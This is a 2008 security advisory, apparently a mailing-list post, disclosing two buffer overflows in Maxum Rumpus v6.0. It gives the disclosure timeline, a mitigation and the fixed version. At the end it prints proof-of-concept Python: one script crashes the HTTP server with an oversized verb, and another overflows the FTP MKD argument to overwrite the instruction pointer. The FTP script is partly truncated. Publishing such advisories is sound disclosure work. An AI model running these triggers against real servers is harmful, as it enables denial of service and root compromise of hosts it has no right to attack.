--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=

:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1


Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FT=
P modules. The first allows an unauthenticated user to crash Rumpus. The la=
ter may result in arbitrary code execution under superuser privilege.

The overflow in HTTP component is caused by the lack of boundary check when=
parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactl=
y 2908-byte long, the server runs into a segmentation fault and crashes. A =
manual restart is required. It has been observed that this problem occurs a=
t other verb lengths too. The vulnerability is rated at moderate severity f=
or the lost of service.

The overflow in FTP component is also caused by the lack of length check wh=
en parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD=
`` and so on. The overflow occurs when the argument is ``strcpy`` to an int=
ernal buffer. This buffer is 1024-byte long. When the passed-in argument is=
longer than 1046 bytes, the instruction pointer will be overwritten. This =
allows a successful attack to run arbitrary code under the privilege of a s=
uperuser (root) by default. Though authorization is required to exploit thi=
s security bug, the vulnerability is rated at critical severity because the=
FTP daemon could be allowing anonymous access.


There is no workaround the first bug.

Disable ANONYMOUS and only allow trusted users to use FTP.


Maxum has released Rumpus v6.0.1 which addressed these bugs.


Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/pol=
icy.html>`_ in notifying vendors.

:Initial vendor contact:

November 28, 2008: Initial contact sent to support@maxum.com

:Vendor response:

November 28, 2008: John requested further communications to be sent to th=
e same address.

:Further communication:

November 28, 2008: Technical details and request for regular update of a =
patch sent to the vendor.

November 29, 2008: Vendor thanked for the bug report and planned to relea=
se v6.0.1 on Monday, December 01.

December 01, 2008: Vendor released 6.0.1 and posted release note at http:=

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

from socket import socket, AF_INET, SOCK_STREAM

host =3D ""
port =3D 80

s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')

For the vulnerability in FTP component::

from socket import socket, AF_INET, SOCK_STREAM
host =3D ""
port =3D 21
user =3D "regular"
pass_ =3D "training"
commands =3D [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
s =3D socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
for line in commands:


The information provided in this advisory is provided "as is" without warra=
nty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, ei=
ther express or implied, including the warranties of merchantability and fi=
tness for a particular purpose. Your use of the information on the advisory=
or materials linked from the advisory is at your own risk. Blue Moon Consu=
lting Co., Ltd reserves the right to change or update this notice at any ti=

--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk
Content-Type: application/pgp-signature

Version: GnuPG v1.4.9 (MingW32)


--Signature=_Mon__1_Dec_2008_23_56_19_+0700_V6rSTsd0 OMyBpHHk--